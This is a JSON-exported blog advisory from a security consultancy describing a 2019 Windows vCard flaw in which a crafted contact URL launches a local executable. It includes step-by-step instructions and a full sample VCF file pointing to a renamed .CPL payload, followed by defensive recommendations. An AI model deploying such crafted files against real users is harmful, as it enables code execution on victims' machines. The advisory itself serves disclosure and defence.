{"id":2344,"date":"2019-01-16T06:39:27","date_gmt":"2019-01-16T06:39:27","guid":{"rendered":"https:\/\/www.varutra.com\/blog\/?p=1735"},"modified":"2022-12-02T15:39:54","modified_gmt":"2022-12-02T10:09:54","slug":"microsoft-zero-day-vcard-vulnerability","status":"publish","type":"post","link":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/","title":{"rendered":"Microsoft Zero Day &#8211; VCard Vulnerability"},"content":{"rendered":"<p><img decoding=\"async\"  src=\"https:\/\/varutra-1a3b6.kxcdn.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg\"  class=\"sh-overlay-item sh-table-cell ls-is-cached lazyloaded\" data-rel=\"lightcase\" title=\"vcffile3 1 - Varutra Consulting\"><br \/>\nIn this blog we are going to discuss about Microsoft Zero Day &#8211; VCard Vulnerability For Windows operating system.<\/p>\n<h3><strong>Introduction Microsoft Zero Day &#8211; VCard Vulnerability:<\/strong><\/h3>\n<p style=\"text-align: left\">A zero day vulnerability has been discovered and reported in the Microsoft&#8217;s Windows operating system. Under a certain scenario it could allow a remote attacker to execute arbitrary code on Windows machine. A remote attacker can maliciously craft a VCard file in a way that the contact&#8217;s website URL stored within the file points to a local executable file, which can be sent within a zipped file via an email or delivered separately via drive-by-download techniques.<\/p>\n<p style=\"text-align: left\">If a victim clicks ton suspicious website URL, the Windows operating system would run the malicious executable without displaying any warning, instead of opening the web address on the browser. Although the attack requires user&#8217;s interaction, leaving the vulnerability unpatched would leave an opportunity for sophisticated attackers to target Windows users at large.<\/p>\n<p><a href=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/01\/severity-score-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1743 size-full\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/01\/severity-score-1.png\" alt=\"Microsoft Zero Day VCard Vulnerability Severity &amp; CVSS Score\" width=\"260\" height=\"72\" \/><\/a><\/p>\n<p style=\"text-align: left\">A vCard is an electronic business (or personal) card and also the name of an industry specification for the kind of communication exchange that is done on business or personal cards. It may have seen a vCard attached to an e-mail note someone has sent you. Because vCard is a published industry specification, software application developers can create programs that process vCards by letting you view them, or drag-and-drop them to an address book or some other application. vCards can include images and sound as well as text.<\/p>\n<p>A promising future use of a vCard will be as a way to quickly fill in application forms on the Web. Just drag-and-drop your own vCard to the form and you won&#8217;t have so many blanks to fill in. For software developers, there is a Personal Data Interchange (PDI) Software Development Kit (SDK). The specification is located at the Internet Mail Consortium&#8217;s Web site where you can also find out about vCalendar , a similar exchange standard for personal time scheduling.<\/p>\n<p><a href=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/01\/Exporting-contacts-in-vCard-format.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1736\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/01\/Exporting-contacts-in-vCard-format.png\" alt=\"Exporting contacts in vCard format\" width=\"421\" height=\"330\" \/><\/a><\/p>\n<h6 style=\"text-align: center\"><strong><em>Figure: Exporting contacts in vCard format<\/em><\/strong><\/h6>\n<p>&nbsp;<\/p>\n<h3><strong>Attack Scenario?<\/strong><\/h3>\n<p><a href=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/01\/VCF-Zero-Day.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-1751 size-full\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/01\/VCF-Zero-Day.jpg\" alt=\"Attack Scenario\" width=\"427\" height=\"737\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2019\/01\/VCF-Zero-Day.jpg 427w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2019\/01\/VCF-Zero-Day-174x300.jpg 174w\" sizes=\"(max-width: 427px) 100vw, 427px\" \/><\/a><\/p>\n<ul>\n<li>Create a directory and name it &#8220;http&#8221; this will house the .CPL exploit file.<\/li>\n<li>Create a .CPL exploit file and give it a website name, for example &#8221; www.varutra.com&#8221; or whatever website you wish so it can be referenced in the VCF file.<\/li>\n<li>Make sure to rename the executable .DLL extension to a .CPL extension if you did not follow compile instructions above to output as &#8220;.CPL&#8221;, e.g. varutra.dll &#8211;&gt; varutra.cpl<\/li>\n<li>Create .VCF mail file for example &#8220;celebrities contacts.vcf&#8221;<\/li>\n<li>For the URL in the .VCF Mail file specify a URL like&#8230;<\/li>\n<\/ul>\n<pre style=\"text-align: left\">URL;TYPE=home;PREF=1: http.\\\\www.varutra.com\r\nThe Windows .VCF File content: \u201ccelebrities contacts.vcf\u201d\r\nBEGIN:VCARD\r\nVERSION:4.0\r\nN:Tricky;DealC0der;;;\r\nFN:TrickyDealC0der\r\nEMAIL;TYPE=home;PREF=&#x75;&#x73;&#x65;&#x72;&#x6e;&#x61;&#x6d;&#x65;&#x40;<span class=\"oe_displaynone\">null<\/span>&#x76;&#x61;&#x72;&#x75;&#x74;&#x72;&#x61;&#x2e;&#x63;&#x6f;&#x6d;\r\nTEL;TYPE=\u201dcell,home\u201d;PREF=1:tel:+919874563214\r\nADR;TYPE=home;PREF=1:;;1 Marigold;Pune;India\r\nURL;TYPE=home;PREF=1:http.\\\\www.varutra.com\r\nEND:VCARD<\/pre>\n<p>Now, open the &#8220;celebrities contacts.vcf&#8221; file and click the website link, the VCF file will traverse back one to the &#8220;http&#8221; directory where the CPL executable file lives.<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Recommendation<\/strong><\/h3>\n<ol>\n<li>Avoid opening unknown vCard Files until the relevant patches are available.<\/li>\n<li>Keep the windows OS patch level up to date.<\/li>\n<li>Avoid opening unknown files and URL&#8217;s on vCard files.<\/li>\n<li>Don\u2019t import the .vcf contacts to Outlook.<\/li>\n<li>Keep Antivirus running and patches up-to date.<\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<h3><strong>References<\/strong><\/h3>\n<ol>\n<li><a href=\"https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-19-013\/\">https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-19-013\/<\/a><\/li>\n<li><a href=\"https:\/\/thehackernews.com\/2019\/01\/vcard-windows-hacking.html\">https:\/\/thehackernews.com\/2019\/01\/vcard-windows-hacking.html<\/a><\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<p>Author,<\/p>\n<div><strong>Jinto T.K.<\/strong><\/div>\n<div>SOC Team<\/div>\n<p><em>Varutra Consulting Pvt. Ltd<\/em><\/p>","protected":false},"excerpt":{"rendered":"<p>In this blog we are going to discuss about Microsoft Zero Day &#8211; VCard Vulnerability For Windows operating system. Introduction Microsoft Zero Day &#8211; VCard&#8230;<\/p>\n","protected":false},"author":3,"featured_media":2962,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[277,273,57,283],"tags":[103,160,161,162,163,164,165,166,167,130],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO Pro 4.6.3 - aioseo.com -->\n\t\t<meta name=\"description\" content=\"A zero day vulnerability has been discovered and reported in the Microsoft&#039;s Windows operating system. It allows a remote attacker to execute arbitrary code.\" \/>\n\t\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t\t<link rel=\"canonical\" href=\"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/\" \/>\n\t\t<meta name=\"generator\" content=\"All in One SEO Pro (AIOSEO) 4.6.3\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"Varutra Consulting\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"Microsoft Zero Day - VCard Vulnerability For Windows OS\" \/>\n\t\t<meta property=\"og:description\" content=\"A zero day vulnerability has been discovered and reported in the Microsoft&#039;s Windows operating system. It allows a remote attacker to execute arbitrary code.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"392\" \/>\n\t\t<meta property=\"og:image:height\" content=\"321\" \/>\n\t\t<meta property=\"article:section\" content=\"Data Privacy\" \/>\n\t\t<meta property=\"article:tag\" content=\"advisory\" \/>\n\t\t<meta property=\"article:tag\" content=\"microsoft zero day\" \/>\n\t\t<meta property=\"article:tag\" content=\"vcard attack\" \/>\n\t\t<meta property=\"article:tag\" content=\"vcard flaw\" \/>\n\t\t<meta property=\"article:tag\" content=\"vcard vulnerability\" \/>\n\t\t<meta property=\"article:tag\" content=\"vcf file\" \/>\n\t\t<meta property=\"article:tag\" content=\"windows zero day\" \/>\n\t\t<meta property=\"article:tag\" content=\"zero day\" \/>\n\t\t<meta property=\"article:tag\" content=\"zero day advisory\" \/>\n\t\t<meta property=\"article:tag\" content=\"zero day attack\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-01-16T06:39:27+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2022-12-02T10:09:54+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n\t\t<meta name=\"twitter:title\" content=\"Microsoft Zero Day - VCard Vulnerability For Windows OS\" \/>\n\t\t<meta name=\"twitter:description\" content=\"A zero day vulnerability has been discovered and reported in the Microsoft&#039;s Windows operating system. It allows a remote attacker to execute arbitrary code.\" \/>\n\t\t<meta name=\"twitter:image\" content=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg\" \/>\n\t\t<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t\t<meta name=\"twitter:data1\" content=\"kalpadmin\" \/>\n\t\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#article\",\"name\":\"Microsoft Zero Day - VCard Vulnerability For Windows OS\",\"headline\":\"Microsoft Zero Day &#8211; VCard Vulnerability\",\"author\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/admin\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#organization\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/wp-content\\\/uploads\\\/2019\\\/03\\\/vcf-file-3-1.jpg\",\"width\":392,\"height\":321,\"caption\":\"vcf-file-3 (1)\"},\"datePublished\":\"2019-01-16T06:39:27+05:30\",\"dateModified\":\"2022-12-02T15:39:54+05:30\",\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#webpage\"},\"articleSection\":\"Data Privacy, Security Best Practices, Vulnerability Disclosure, Zero Day Attack, advisory, Microsoft Zero Day, vCard attack, vcard flaw, vCard Vulnerability, VCF file, Windows zero day, zero day, Zero Day Advisory, Zero Day Attack\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/\",\"nextItem\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#listItem\"},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#listItem\",\"position\":2,\"name\":\"Microsoft Zero Day - VCard Vulnerability\",\"previousItem\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#listItem\"}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#organization\",\"name\":\"Varutra\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/Varutra-Found-e1612984024606.jpg\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#organizationLogo\"},\"image\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#organizationLogo\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/admin\\\/#author\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/admin\\\/\",\"name\":\"kalpadmin\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#authorImage\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d69b4bf504d3e2e3c6ad0c424e16bcb2?s=96&d=mm&r=g\",\"width\":96,\"height\":96,\"caption\":\"kalpadmin\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#webpage\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/\",\"name\":\"Microsoft Zero Day - VCard Vulnerability For Windows OS\",\"description\":\"A zero day vulnerability has been discovered and reported in the Microsoft's Windows operating system. It allows a remote attacker to execute arbitrary code.\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/admin\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/author\\\/admin\\\/#author\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/wp-content\\\/uploads\\\/2019\\\/03\\\/vcf-file-3-1.jpg\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#mainImage\",\"width\":392,\"height\":321,\"caption\":\"vcf-file-3 (1)\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/microsoft-zero-day-vcard-vulnerability\\\/#mainImage\"},\"datePublished\":\"2019-01-16T06:39:27+05:30\",\"dateModified\":\"2022-12-02T15:39:54+05:30\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#website\",\"url\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/\",\"name\":\"Varutra Consulting\",\"description\":\"Secure your digital world with our Cybersecurity services.\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.varutra.com\\\/varutravrt3\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO Pro -->\r\n\t\t<title>Microsoft Zero Day - VCard Vulnerability For Windows OS<\/title>\n\n","aioseo_head_json":{"title":"Microsoft Zero Day - VCard Vulnerability For Windows OS","description":"A zero day vulnerability has been discovered and reported in the Microsoft's Windows operating system. It allows a remote attacker to execute arbitrary code.","canonical_url":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"og:locale":"en_US","og:site_name":"Varutra Consulting","og:type":"article","og:title":"Microsoft Zero Day - VCard Vulnerability For Windows OS","og:description":"A zero day vulnerability has been discovered and reported in the Microsoft's Windows operating system. It allows a remote attacker to execute arbitrary code.","og:url":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/","og:image":"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg","og:image:secure_url":"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg","og:image:width":"392","og:image:height":"321","article:section":"Data Privacy","article:tag":["advisory","microsoft zero day","vcard attack","vcard flaw","vcard vulnerability","vcf file","windows zero day","zero day","zero day advisory","zero day attack"],"article:published_time":"2019-01-16T06:39:27+00:00","article:modified_time":"2022-12-02T10:09:54+00:00","twitter:card":"summary_large_image","twitter:title":"Microsoft Zero Day - VCard Vulnerability For Windows OS","twitter:description":"A zero day vulnerability has been discovered and reported in the Microsoft's Windows operating system. It allows a remote attacker to execute arbitrary code.","twitter:image":"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg","twitter:label1":"Written by","twitter:data1":"kalpadmin","twitter:label2":"Est. reading time","twitter:data2":"3 minutes","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#article","name":"Microsoft Zero Day - VCard Vulnerability For Windows OS","headline":"Microsoft Zero Day &#8211; VCard Vulnerability","author":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/admin\/#author"},"publisher":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/#organization"},"image":{"@type":"ImageObject","url":"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg","width":392,"height":321,"caption":"vcf-file-3 (1)"},"datePublished":"2019-01-16T06:39:27+05:30","dateModified":"2022-12-02T15:39:54+05:30","inLanguage":"en-US","mainEntityOfPage":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#webpage"},"isPartOf":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#webpage"},"articleSection":"Data Privacy, Security Best Practices, Vulnerability Disclosure, Zero Day Attack, advisory, Microsoft Zero Day, vCard attack, vcard flaw, vCard Vulnerability, VCF file, Windows zero day, zero day, Zero Day Advisory, Zero Day Attack"},{"@type":"BreadcrumbList","@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/www.varutra.com\/varutravrt3\/#listItem","position":1,"name":"Home","item":"https:\/\/www.varutra.com\/varutravrt3\/","nextItem":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#listItem"},{"@type":"ListItem","@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#listItem","position":2,"name":"Microsoft Zero Day - VCard Vulnerability","previousItem":"https:\/\/www.varutra.com\/varutravrt3\/#listItem"}]},{"@type":"Organization","@id":"https:\/\/www.varutra.com\/varutravrt3\/#organization","name":"Varutra","url":"https:\/\/www.varutra.com\/varutravrt3\/","logo":{"@type":"ImageObject","url":"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Varutra-Found-e1612984024606.jpg","@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#organizationLogo"},"image":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#organizationLogo"}},{"@type":"Person","@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/admin\/#author","url":"https:\/\/www.varutra.com\/varutravrt3\/author\/admin\/","name":"kalpadmin","image":{"@type":"ImageObject","@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#authorImage","url":"https:\/\/secure.gravatar.com\/avatar\/d69b4bf504d3e2e3c6ad0c424e16bcb2?s=96&d=mm&r=g","width":96,"height":96,"caption":"kalpadmin"}},{"@type":"WebPage","@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#webpage","url":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/","name":"Microsoft Zero Day - VCard Vulnerability For Windows OS","description":"A zero day vulnerability has been discovered and reported in the Microsoft's Windows operating system. It allows a remote attacker to execute arbitrary code.","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/#website"},"breadcrumb":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#breadcrumblist"},"author":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/admin\/#author"},"creator":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/author\/admin\/#author"},"image":{"@type":"ImageObject","url":"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg","@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#mainImage","width":392,"height":321,"caption":"vcf-file-3 (1)"},"primaryImageOfPage":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/microsoft-zero-day-vcard-vulnerability\/#mainImage"},"datePublished":"2019-01-16T06:39:27+05:30","dateModified":"2022-12-02T15:39:54+05:30"},{"@type":"WebSite","@id":"https:\/\/www.varutra.com\/varutravrt3\/#website","url":"https:\/\/www.varutra.com\/varutravrt3\/","name":"Varutra Consulting","description":"Secure your digital world with our Cybersecurity services.","inLanguage":"en-US","publisher":{"@id":"https:\/\/www.varutra.com\/varutravrt3\/#organization"}}]}},"aioseo_meta_data":{"post_id":"2344","title":"Microsoft Zero Day - VCard Vulnerability For Windows OS","description":"A zero day vulnerability has been discovered and reported in the Microsoft's Windows operating system. It allows a remote attacker to execute arbitrary code.","keywords":[],"keyphrases":"{\"focus\":{\"keyphrase\":\"Zero Day \",\"score\":90,\"analysis\":{\"keyphraseInTitle\":{\"title\":\"Focus keyphrase in SEO title\",\"description\":\"Focus keyphrase found in SEO title.\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseInDescription\":{\"title\":\"Focus keyphrase in meta description\",\"description\":\"Focus keyphrase found in meta description.\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseLength\":{\"title\":\"Focus keyphrase length\",\"description\":\"Good job!\",\"score\":9,\"maxScore\":9,\"error\":0,\"length\":2},\"keyphraseInURL\":{\"title\":\"Focus keyphrase in URL\",\"description\":\"Focus keyphrase used in the URL.\",\"score\":5,\"maxScore\":5,\"error\":0},\"keyphraseInIntroduction\":{\"title\":\"Focus keyphrase in introduction\",\"description\":\"Your Focus keyphrase appears in the first paragraph. Well done!\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseInSubHeadings\":{\"title\":\"Focus keyphrase in Subheadings\",\"description\":\"Use more focus keyphrases in your H2 and H3 subheadings!\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseInImageAlt\":{\"title\":\"Focus keyphrase in image alt attributes\",\"description\":\"Focus keyphrase found in image alt attribute(s).\",\"score\":9,\"maxScore\":9,\"error\":0}}},\"additional\":[{\"keyphrase\":\"Microsoft Zero Day\",\"score\":67,\"analysis\":{\"keyphraseInDescription\":{\"title\":\"Keyphrase in meta description\",\"description\":\"Keyphrase not found in meta description.\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseLength\":{\"title\":\"Keyphrase length\",\"description\":\"Good job!\",\"score\":9,\"maxScore\":9,\"error\":0,\"length\":3},\"keyphraseInIntroduction\":{\"title\":\"Keyphrase in introduction\",\"description\":\"Your Keyphrase does not appear in the first paragraph. Make sure the topic is clear immediately.\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseInImageAlt\":{\"title\":\"Keyphrase in image alt attributes\",\"description\":\"Keyphrase found in image alt attribute(s).\",\"score\":9,\"maxScore\":9,\"error\":0}}},{\"keyphrase\":\"VCard Vulnerability\",\"score\":67,\"analysis\":{\"keyphraseInDescription\":{\"title\":\"Keyphrase in meta description\",\"description\":\"Keyphrase not found in meta description.\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseLength\":{\"title\":\"Keyphrase length\",\"description\":\"Good job!\",\"score\":9,\"maxScore\":9,\"error\":0,\"length\":2},\"keyphraseInIntroduction\":{\"title\":\"Keyphrase in introduction\",\"description\":\"Your Keyphrase does not appear in the first paragraph. Make sure the topic is clear immediately.\",\"score\":3,\"maxScore\":9,\"error\":1},\"keyphraseInImageAlt\":{\"title\":\"Keyphrase in image alt attributes\",\"description\":\"Keyphrase found in image alt attribute(s).\",\"score\":9,\"maxScore\":9,\"error\":0}}},{\"keyphrase\":\"Vulnerability\",\"score\":100,\"analysis\":{\"keyphraseInDescription\":{\"title\":\"Keyphrase in meta description\",\"description\":\"Keyphrase found in meta description.\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseLength\":{\"title\":\"Keyphrase length\",\"description\":\"Good job!\",\"score\":9,\"maxScore\":9,\"error\":0,\"length\":1},\"keyphraseInIntroduction\":{\"title\":\"Keyphrase in introduction\",\"description\":\"Your Keyphrase appears in the first paragraph. Well done!\",\"score\":9,\"maxScore\":9,\"error\":0},\"keyphraseInImageAlt\":{\"title\":\"Keyphrase in image alt attributes\",\"description\":\"Keyphrase found in image alt attribute(s).\",\"score\":9,\"maxScore\":9,\"error\":0}}}]}","primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"featured","og_image_url":"https:\/\/www.varutra.com\/wp-content\/uploads\/2019\/03\/vcf-file-3-1.jpg","og_image_width":"392","og_image_height":"321","og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":"Data Privacy","og_article_tags":[],"twitter_use_og":true,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":"{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}","pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"limit_modified_date":false,"open_ai":null,"created":"2021-10-27 15:16:26","updated":"2022-12-02 10:23:28"},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/www.varutra.com\/varutravrt3\" title=\"Home\">Home<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t<a href=\"https:\/\/www.varutra.com\/varutravrt3\/category\/data-privacy\/\" title=\"Data Privacy\">Data Privacy<\/a>\n<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\tMicrosoft Zero Day \u2013 VCard Vulnerability\n<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/www.varutra.com\/varutravrt3"},{"label":"Data Privacy","link":"https:\/\/www.varutra.com\/varutravrt3\/category\/data-privacy\/"},{"label":"Microsoft Zero Day &#8211; VCard 